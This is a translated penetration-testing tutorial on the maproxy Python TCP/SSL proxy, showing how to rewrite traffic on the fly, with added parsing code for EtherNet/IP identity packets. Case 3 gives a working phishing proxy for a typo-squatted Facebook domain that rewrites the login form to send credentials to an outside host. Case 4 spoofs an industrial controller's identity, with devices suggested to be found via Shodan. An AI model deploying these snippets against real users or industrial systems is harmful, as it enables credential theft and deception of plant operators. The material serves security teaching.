Manipulating network data on the fly

This translation of the article was prepared ahead of the start of the course "Pentest. Penetration Testing".


Abstract

Various kinds of security testing, from regular penetration tests and Red Team operations to breaking IoT/ICS and SCADA devices, involve working with binary network protocols, that is, intercepting and modifying network data between the client and the target. Sniffing network traffic is not a hard task, since we have tools such as Wireshark, Tcpdump or Scapy, but modification is a much more laborious job: we need some kind of interface to read network data, filter it, change it on the fly and send it on to the target host almost in real time. In addition, it would be good if such a tool could handle many parallel connections automatically and could be customised with scripts.

One day I came across a tool called maproxy; its documentation quickly made it clear to me that maproxy is exactly what I was looking for. It is a simple, flexible and easily configurable TCP proxy. I tested this tool on several more complex applications, including ICS devices (which generate a lot of packets), to see whether it could handle many parallel connections, and the tool performed well.

This article will show you how to manipulate network data on the fly using maproxy.

Overview

The maproxy tool is based on Tornado, a popular and mature networking framework for Python.

In general, it can operate in several modes:

  • TCP:TCP - unencrypted TCP connections;
  • TCP:SSL and SSL:TCP - with one-way encryption;
  • SSL:SSL - two-way encryption.

It comes as a library. For a quick start, you can use the example files that demonstrate the main functions of the library:

  • all.py
  • certificate.pem
  • logging_proxy.py
  • privatekey.pem
  • ssl2ssl.py
  • ssl2tcp.py
  • tcp2ssl.py
  • tcp2tcp.py

Case 1 - a simple bidirectional proxy

Based on tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

# Forward every connection accepted on port 2222 to the SSH server on localhost:22
server = maproxy.proxyserver.ProxyServer("localhost", 22)
server.listen(2222)
# Hand control to Tornado's event loop, which services all connections
tornado.ioloop.IOLoop.instance().start()

The ProxyServer() constructor takes two arguments - the target host and the target port. server.listen() takes one argument - the port on which to listen for incoming connections.

Run the script:

# python tcp2tcp.py

For the test we connect to the local SSH server through our proxy script, which listens on port 2222/tcp and connects to the SSH server's backend port 22/tcp:

[screenshot]

The welcome banner tells us that our example script has successfully proxied the network traffic.

Case 2 - modifying data

Another demo script, logging_proxy.py, is well suited to working with network data. The comments in the file describe the class methods you can override to achieve your goal:

[screenshot]

The most interesting ones are:

  • on_c2p_done_read - intercepts data on its way from the client to the server;
  • on_p2s_done_read - the reverse direction.

Let's try to change the SSH banner that the server returns to the client:

[…]
    def on_p2s_done_read(self, data):
        # Rewrite the server's banner before it reaches the client.
        # Bytes literals keep this working on both Python 2 and 3, where the data is bytes.
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# The session factory is what makes the proxy use our LoggingSession subclass
server = maproxy.proxyserver.ProxyServer("localhost", 22, session_factory=LoggingSessionFactory())
server.listen(2222)
[…]

Run the script:

[screenshot]

As you can see, the client was misled, because the SSH server name was changed to «DumnySSH».
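One check worth making before relying on a per-callback replace(): on_p2s_done_read() receives whatever the last socket read returned, so a banner or any other pattern can arrive split across two calls, and data.replace() applied to each chunk on its own will miss it. The code below is an added example, not code from the article or from maproxy. It shows a small rewriter that carries a tail between chunks; it assumes one instance per session, with feed() called from the callback and its result passed to the parent method (the hook names are those used in the article; which callback tells a session that the connection has closed, so that flush() can release held-back bytes, is left as an assumption).

```python
# Added example (not from the article or from maproxy): a rewriter for a
# TCP stream that still finds a pattern when it is split across two reads.

class StreamRewriter:
    """Replace `old` with `new` across a sequence of chunks.

    Bytes at the end of a chunk that could be the beginning of `old` are held
    back until the next chunk (or flush()) decides whether they match."""

    def __init__(self, old, new):
        if not old:
            raise ValueError("pattern must not be empty")
        self.old, self.new = old, new
        self.tail = b""   # suffix of the previous chunk that may start a match

    def feed(self, chunk):
        """Return the bytes that are safe to forward after this chunk."""
        buf = self.tail + chunk
        out = bytearray()
        pos = 0
        while True:
            hit = buf.find(self.old, pos)
            if hit < 0:
                break
            out += buf[pos:hit] + self.new
            pos = hit + len(self.old)
        rest = buf[pos:]                     # contains no complete match
        keep = 0                             # longest suffix of rest that is a proper prefix of old
        for k in range(min(len(self.old) - 1, len(rest)), 0, -1):
            if self.old.startswith(rest[-k:]):
                keep = k
                break
        self.tail = rest[len(rest) - keep:] if keep else b""
        out += rest[:len(rest) - keep]
        return bytes(out)

    def flush(self):
        """Release any held-back bytes, e.g. when the connection closes."""
        tail, self.tail = self.tail, b""
        return tail


def rewrite_chunks(old, new, chunks):
    """Convenience: run all chunks through one rewriter and join the output."""
    rw = StreamRewriter(old, new)
    return b"".join(rw.feed(c) for c in chunks) + rw.flush()


def naive_rewrite_chunks(old, new, chunks):
    """The per-chunk replace() used in the proxy snippet, for comparison."""
    return b"".join(c.replace(old, new) for c in chunks)


# How it would sit in the session class from the article (assumed placement,
# one rewriter per session; the hook name is the one the article uses):
#
#   def on_p2s_done_read(self, data):
#       data = self.banner_rw.feed(data)
#       super(LoggingSession, self).on_p2s_done_read(data)

if __name__ == "__main__":
    # Constructed sample: a banner that the socket delivered in two reads
    parts = [b"SSH-2.0-Open", b"SSH_7.9p1 Debian-10\r\n"]
    print(naive_rewrite_chunks(b"OpenSSH", b"DumnySSH", parts))   # unchanged
    print(rewrite_chunks(b"OpenSSH", b"DumnySSH", parts))         # rewritten
```

The price of the held-back tail is a small delay: at most len(old) - 1 bytes wait for the next read, which matters little for a banner but is worth knowing for an interactive protocol. Once the banner has been handled, a proxy can simply stop calling the rewriter for that session.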

[screenshot]

Case 3 - a simple phishing web page

There are endless ways to use this tool. This time let's focus on something more practical for the Red Team side. Let's imitate the m.facebook.com landing page and use a domain with a deliberate typo, for example m.facebok.com. For demonstration purposes, let's simply assume that the domain is registered by us.

We will set up an unencrypted network connection between our victim and the proxy, and an SSL stream to the Facebook server (31.13.81.36). For this example to work, we need to replace the HTTP Host header with the correct hostname, and we will disable response compression so that we can easily access the content. Finally we replace the HTML form so that the login credentials are sent to us instead of Facebook's servers:

[…]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/xh/login/"', b'action="https://redteam.pl/"')
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# Plain TCP towards the client on port 80, SSL towards the server on port 443
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

Result:

[screenshot]

As you can see, we successfully replaced the original page.

Case 4 - Ethernet/IP spoofing

I have worked for a long time with industrial devices and software (ICS/SCADA), such as programmable logic controllers (PLCs), I/O modules, relays, ladder programming environments and many others. This case is for those who like industrial things. Hacking such solutions involves actively playing with network protocols. In the following example I would like to show how you can modify ICS/SCADA network traffic.

For this you will need the following:

  • A network sniffer, for example Wireshark;
  • An Ethernet/IP or simply a CIP device; you can find one using the Shodan service;
  • Our script based on maproxy.

First, let's look at what a typical identity response from CIP (Common Industrial Protocol) looks like:

[screenshot]

Device identification is done over the Ethernet/IP protocol, an industrial Ethernet encapsulation that wraps control protocols such as CIP. We will change the identity name visible in the screenshot, "NI-IndComm for Ethernet", using our proxy script. We can reuse the logging_proxy.py script and, in the same way as before, override the on_p2s_done_read class method, since we want the client to see a different identity name.

Code:

[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response

        # Check whether this is a List Identity response: after the 24-byte
        # encapsulation header and the 2-byte item count, the CPF item type
        # at offset 26 is 0x000C (little-endian) for a List Identity item
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # The product name starts at offset 63; overwrite its first ten bytes
            # with ten new ones so that no length field in the packet changes
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# 44818/tcp is the Ethernet/IP encapsulation port; 1.3.3.7 stands for the device
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

Essentially, we requested the device identity twice: the second response is the original one, and the first was modified on the fly.
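The slices data[26:28] and data[63:] in the snippet above are fixed positions in the EtherNet/IP encapsulation: a 24-byte encapsulation header, a 2-byte CPF item count, the item type at offset 26 (0x000C for a List Identity response) and the item length at 28; the item body then carries the encapsulation version, a 16-byte socket address, vendor ID, device type, product code, revision, status, serial number and a one-byte name length, which puts the product name at offset 63. The replacement above works only because DUMMY31337 overwrites exactly ten bytes of the original name, so none of the three length fields (encapsulation length, item length, name length) has to change. The code below is an added example, not code from the article or from maproxy: it parses a List Identity response following the public EtherNet/IP encapsulation layout, rejects one whose lengths do not match the bytes actually present (which is also how a different-length slice replacement would be caught), and rewrites the product name while updating all three lengths. The sample response is constructed inline, not captured from a device; vendor, serial and the other values are made up.

```python
import struct

# Added example: EtherNet/IP List Identity response parser and rewriter.
# Not code from the article or from maproxy; the layout follows the public
# EtherNet/IP encapsulation specification, and all sample values are constructed.

ENCAP_HEADER = struct.Struct("<HHIIQI")   # command, length, session, status, sender context, options
ENCAP_HEADER_LEN = ENCAP_HEADER.size      # 24 bytes
CMD_LIST_IDENTITY = 0x0063
ITEM_LIST_IDENTITY_RESPONSE = 0x000C      # the b'\x0c\x00' the proxy snippet looks for at offset 26
CPF_HEADER = struct.Struct("<HHH")        # item count, item type, item length
SOCKADDR = struct.Struct(">hH4s8x")       # sin_family, sin_port, sin_addr, sin_zero (big-endian per spec)
IDENT_FIXED = struct.Struct("<HHHBBHIB")  # vendor, device type, product code, rev major/minor, status, serial, name length


def build_list_identity_response(product_name, ip=b"\x0a\x00\x00\x05", port=44818,
                                 vendor=0x1337, device_type=0x000C, product_code=1,
                                 revision=(1, 2), status=0, serial=0x11223344, state=0xFF):
    """Construct a List Identity response (constructed sample, not a capture)."""
    item_body = (struct.pack("<H", 1)                          # encapsulation protocol version
                 + SOCKADDR.pack(2, port, ip)                  # AF_INET = 2
                 + IDENT_FIXED.pack(vendor, device_type, product_code, revision[0],
                                    revision[1], status, serial, len(product_name))
                 + product_name
                 + struct.pack("<B", state))
    cpf = CPF_HEADER.pack(1, ITEM_LIST_IDENTITY_RESPONSE, len(item_body)) + item_body
    return ENCAP_HEADER.pack(CMD_LIST_IDENTITY, len(cpf), 0, 0, 0, 0) + cpf


def parse_list_identity(data):
    """Decode a List Identity response; return None if the command or item type
    is wrong or any of the three length fields disagrees with the actual size."""
    if len(data) < ENCAP_HEADER_LEN + CPF_HEADER.size:
        return None
    command, encap_len = ENCAP_HEADER.unpack_from(data, 0)[:2]
    if command != CMD_LIST_IDENTITY or encap_len != len(data) - ENCAP_HEADER_LEN:
        return None
    item_count, item_type, item_len = CPF_HEADER.unpack_from(data, ENCAP_HEADER_LEN)
    body_off = ENCAP_HEADER_LEN + CPF_HEADER.size              # 30
    if item_count != 1 or item_type != ITEM_LIST_IDENTITY_RESPONSE:
        return None
    if item_len < 2 + SOCKADDR.size + IDENT_FIXED.size + 1 or body_off + item_len != len(data):
        return None
    version, = struct.unpack_from("<H", data, body_off)
    family, port, ip = SOCKADDR.unpack_from(data, body_off + 2)
    (vendor, device_type, product_code, rev_major, rev_minor,
     dev_status, serial, name_len) = IDENT_FIXED.unpack_from(data, body_off + 2 + SOCKADDR.size)
    name_off = body_off + 2 + SOCKADDR.size + IDENT_FIXED.size   # 63, as in the proxy snippet
    if name_off + name_len + 1 != len(data):                     # name plus the trailing state byte
        return None
    return {
        "encap_length": encap_len, "item_length": item_len, "version": version,
        "ip": ".".join(str(b) for b in ip), "port": port,
        "vendor": vendor, "device_type": device_type, "product_code": product_code,
        "revision": (rev_major, rev_minor), "status": dev_status, "serial": serial,
        "name_offset": name_off, "product_name": data[name_off:name_off + name_len],
        "state": data[name_off + name_len],
    }


def rewrite_product_name(data, new_name):
    """Return a copy of `data` with the product name replaced and the name length,
    CPF item length and encapsulation length all updated to match."""
    info = parse_list_identity(data)
    if info is None:
        raise ValueError("not a well-formed List Identity response")
    if len(new_name) > 255:
        raise ValueError("the name length is a single byte")
    name_off, old_len = info["name_offset"], len(info["product_name"])
    delta = len(new_name) - old_len
    out = bytearray(data)
    out[name_off:name_off + old_len] = new_name
    out[name_off - 1] = len(new_name)
    struct.pack_into("<H", out, ENCAP_HEADER_LEN + 4, info["item_length"] + delta)
    struct.pack_into("<H", out, 2, info["encap_length"] + delta)
    return bytes(out)


if __name__ == "__main__":
    sample = build_list_identity_response(b"CONSTRUCTED-PLC")
    print(parse_list_identity(sample))
    print(parse_list_identity(rewrite_product_name(sample, b"DUMMY31337"))["product_name"])
```

parse_list_identity() doubles as a sanity check on what a proxy emits: a response whose name was replaced by a slice of a different length fails the length checks, which is also what a dissector or a strict device stack would reject.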

And finally

In my opinion maproxy is a fitting and simple tool, and one written in Python, so I believe you too can benefit from using it. Of course, there are far more sophisticated tools for processing and modifying network data, but they require more attention and are usually built for a specific use case, e.g. Muraena, Modlishka or evilginx for scenarios like the third one, or canape for the last one. One way or another, with maproxy you can quickly implement your ideas for intercepting network data, because the example scripts are very clear.


Source: www.habr.com
